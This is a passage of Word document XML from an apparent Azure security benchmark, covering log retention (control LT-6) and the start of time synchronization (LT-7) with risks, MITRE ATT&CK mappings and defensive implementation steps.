    </w:p>
    <w:p w14:paraId="1BFE301A" w14:textId="152221AC" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00A91907">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc242449531"/>
      <w:r w:rsidRPr="00A91907">
        <w:t>LT-6: Configure log storage retention</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="166A5721" w14:textId="3D6ADF95" w:rsidR="00A91907" w:rsidRDefault="00A91907">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4AC1C1" w14:textId="584582C9" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Configure log retention periods aligned with regulatory requirements, compliance mandates, and investigation timelines. Balance forensic evidence preservation requirements against storage costs through tiered retention strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7849720A" w14:textId="0D40E7C0" w:rsidR="00A91907" w:rsidRDefault="00A91907">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A91907">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4F58B042" w14:textId="6D412DD8" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Evidence expiration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED5E06C" w14:textId="32F22008" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Critical forensic data (authentication logs, access patterns, network flows) expires before security teams discover breaches—average dwell time of 200+ days means logs must persist long enough to investigate historical compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EE142D" w14:textId="0C19B8FB" w:rsidR="00C54739" w:rsidRDefault="00C54739" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00C54739">
        <w:t>Compliance violations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39200F86" w14:textId="14DF9F69" w:rsidR="00C54739" w:rsidRDefault="00C54739" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00C54739">
        <w:t>Regulatory mandates (PCI-DSS 10.7: 1 year, GDPR: varies by jurisdiction, HIPAA: 6 years) require specific retention periods—inadequate retention creates audit findings, certification failures, and regulatory penalties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486B80A2" w14:textId="441579DF" w:rsidR="00C54739" w:rsidRDefault="00C54739" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00C54739">
        <w:t>Incomplete incident reconstruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E25BECC" w14:textId="59EEDB8F" w:rsidR="00C54739" w:rsidRDefault="00C54739" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00C54739">
        <w:t xml:space="preserve">Historical correlation of indicators across extended breach timelines becomes impossible when logs expire </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C54739">
        <w:t>prematurely—preventing</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C54739">
        <w:t xml:space="preserve"> full kill chain analysis and root cause determination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C08546" w14:textId="0B79F19F" w:rsidR="00C54739" w:rsidRDefault="00C54739" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00C54739">
        <w:t>Legal discovery gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2C7602" w14:textId="2BD06DF7" w:rsidR="00C54739" w:rsidRDefault="00C54739" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00C54739">
        <w:t>Litigation, regulatory investigations, and internal audits require production of historical security logs—missing logs create legal exposure and inability to defend organizational practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A35B2DA" w14:textId="33110D3E" w:rsidR="00C54739" w:rsidRDefault="00C54739" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00C54739">
        <w:t>Pattern analysis blindness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3818F2" w14:textId="0AE7BC80" w:rsidR="00C54739" w:rsidRDefault="00C54739" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00C54739">
        <w:t>Machine learning models and behavioral baselines require historical training data—short retention prevents detection of slow-burn attacks, seasonal patterns, or long-term trend analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB7E3D3" w14:textId="3D6E8FDD" w:rsidR="00C54739" w:rsidRDefault="00C54739" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00C54739">
        <w:t>Cost overruns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A2A00C" w14:textId="1945EBBF" w:rsidR="00C54739" w:rsidRDefault="00C54739" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00C54739">
        <w:t>Lack of retention tiering strategy (hot vs. cold storage) leads to expensive Log Analytics retention for long-term archival needs better served by Azure Storage—inflating operational costs unnecessarily</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6836EC24" w14:textId="2B710AB8" w:rsidR="00C54739" w:rsidRDefault="00C54739" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00C54739">
        <w:t>Retention policy drift</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECD6392" w14:textId="1ED2AFCC" w:rsidR="00C54739" w:rsidRDefault="00C54739" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00C54739">
        <w:t>Inconsistent retention across services (90 days for Activity Logs, 30 days for resource logs, indefinite for some services) creates investigative blind spots and unpredictable forensic coverage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600F2312" w14:textId="42642569" w:rsidR="00106BE4" w:rsidRDefault="00106BE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00106BE4">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C466E2D" w14:textId="1712E1BC" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25182AFC" w14:textId="730A91AB" w:rsidR="00930B8A" w:rsidRPr="00FE1E41" w:rsidRDefault="00930B8A" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="398"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00930B8A">
        <w:t>indicator removal (T1070) attackers leveraging short retention windows to ensure evidence expires naturally without requiring active log deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB7F870" w14:textId="6DDE3439" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28627CA3" w14:textId="0FEF9854" w:rsidR="00930B8A" w:rsidRPr="00FE1E41" w:rsidRDefault="00930B8A" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="398"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00930B8A">
        <w:t>account manipulation (T1098) establishing long-term backdoor access with confidence that initial compromise evidence will age out before detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FA1BC5" w14:textId="40ED4EA6" w:rsidR="00105F1F" w:rsidRDefault="00106BE4" w:rsidP="00106BE4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106BE4">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LT-6.1: Implement log retention strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7768F142" w14:textId="49A70C1F" w:rsidR="00106BE4" w:rsidRDefault="00106BE4" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00106BE4">
        <w:t>Balance forensic preservation needs with storage costs by implementing tiered retention strategies aligned to regulatory mandates and investigation timelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25334727" w14:textId="70974743" w:rsidR="00106BE4" w:rsidRDefault="00106BE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00106BE4">
        <w:t>Route logs to appropriate storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4DFCC3" w14:textId="063B9B83" w:rsidR="00106BE4" w:rsidRDefault="00106BE4" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00106BE4">
        <w:t>Create diagnostic settings to route Azure Activity Logs and other resource logs to appropriate storage locations based on retention requirements, compliance mandates, and investigation timelines balancing hot vs. cold storage costs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B88AA4A" w14:textId="4EC98B0A" w:rsidR="00106BE4" w:rsidRDefault="00106BE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00106BE4">
        <w:t>Configure short-to-medium term retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF2656B" w14:textId="38BB25BE" w:rsidR="00106BE4" w:rsidRDefault="00106BE4" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00106BE4">
        <w:t>Use Azure Monitor Log Analytics workspace for log retention up to 1-2 years for active investigation, threat hunting, and operational analytics with KQL query capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C65C2A" w14:textId="5E51FB0C" w:rsidR="00106BE4" w:rsidRDefault="00106BE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00106BE4">
        <w:t>Implement long-term archival storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772206E7" w14:textId="6A4DE57A" w:rsidR="00106BE4" w:rsidRDefault="00106BE4" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00106BE4">
        <w:t>Use Azure Storage, Data Explorer, or Data Lake for long-term and archival storage beyond 1-2 years to meet compliance requirements (PCI-DSS, SEC 17a-4, HIPAA) with significant cost reduction through cold/archive tiers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1DCCC0" w14:textId="6E954441" w:rsidR="00106BE4" w:rsidRDefault="00106BE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00106BE4">
        <w:t>Forward logs externally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1502CF54" w14:textId="64CE57CB" w:rsidR="00106BE4" w:rsidRDefault="00106BE4" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00106BE4">
        <w:t>Use Azure Event Hubs to forward logs to external SIEM, data lake, or third-party security systems outside Azure when required for multi-cloud visibility or legacy integrations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D05EFC5" w14:textId="10D7BBDA" w:rsidR="00106BE4" w:rsidRDefault="00106BE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00106BE4">
        <w:t>Configure storage account retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEC86D0" w14:textId="436AFDE2" w:rsidR="00106BE4" w:rsidRDefault="00106BE4" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00106BE4">
        <w:t>Configure retention policies for Azure Storage account logs based on compliance requirements, implementing lifecycle management for automatic tier transitions and deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2837B0" w14:textId="75B9BAC6" w:rsidR="00106BE4" w:rsidRDefault="00106BE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00106BE4">
        <w:t>Plan Sentinel log retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206AE51B" w14:textId="68A57A46" w:rsidR="00106BE4" w:rsidRDefault="00106BE4" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00106BE4">
        <w:t>Implement long-term storage strategy for Microsoft Sentinel logs since Sentinel uses Log Analytics workspace as its backend, requiring explicit archival configuration for extended retention beyond workspace limits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492937CF" w14:textId="554867A1" w:rsidR="00106BE4" w:rsidRDefault="00106BE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00106BE4">
        <w:t>Archive security alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBB28D2" w14:textId="07E06ABF" w:rsidR="00106BE4" w:rsidRDefault="00106BE4" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00106BE4">
        <w:t>Configure continuous export for Microsoft Defender for Cloud alerts and recommendations to meet retention requirements since Defender for Cloud data has limited retention in the native portal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B8DD3F" w14:textId="30A2FA24" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41" w:rsidP="00FE1E41">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc242449532"/>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>LT-7: Use approved time synchronization sources</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="2A9EDD50" w14:textId="728DDC96" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA9CFC7" w14:textId="2EEDBC89" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>Synchronize all systems to authoritative time sources to maintain accurate timestamps across security logs. Consistent time synchronization enables reliable log correlation, incident timeline reconstruction, and forensic analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0847CC11" w14:textId="4B5FF454" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4AE01F53" w14:textId="2E7DE8CA" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:lastRenderedPageBreak/>
        <w:t>Forensic timeline corruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B40C11D" w14:textId="1D82C517" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="206"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>Incident reconstruction becomes impossible when logs from different sources show conflicting timestamps—investigators cannot determine attack sequence or correlate events across systems (VM logs showing attack at 10:00 AM, firewall logs showing same event at 9:45 AM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FECB89" w14:textId="6410DD79" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>SIEM correlation failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7817A0A1" w14:textId="59D5F554" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="206"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>Security analytics and correlation rules fail when time drift causes events to arrive out of order—missed detections as rule logic expects chronological event sequences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AB382A" w14:textId="1529E1BE" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>Authentication bypass opportunities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7E8F71" w14:textId="3DF358C3" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="206"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>Time-based authentication mechanisms (Kerberos tickets, JWT tokens, OTP codes) become exploitable when clock skew enables replay attacks or extends token validity windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B269244" w14:textId="35DEA7C9" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>Compliance audit failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208522CB" w14:textId="3AD66AF8" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="206"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>Regulatory frameworks (PCI-DSS 10.4, SOC 2, HIPAA) mandate accurate time synchronization for audit trail integrity—time drift creates audit findings and questions evidence reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1619C6" w14:textId="19E00B60" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>False positive/negative alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A18AD7" w14:textId="32925D35" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="206"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>Anomaly detection and behavioral analytics generate incorrect alerts when time drift causes normal activities to appear outside expected time windows or suspicious patterns to appear benign.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BADCCEA" w14:textId="6A95F6C0" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>Certificate validation errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D54152D" w14:textId="3888A5FC" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="206"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E41">
        <w:t xml:space="preserve">SSL/TLS certificate validity checks fail or succeed incorrectly when system clocks drift outside certificate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>NotBefore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE1E41">
        <w:t>NotAfter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE1E41">
        <w:t xml:space="preserve"> windows—causing either service disruptions or security bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C32A850" w14:textId="6C0650B2" w:rsidR="00FE1E41" w:rsidRDefault="00FE1E41" w:rsidP="00CF2D95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
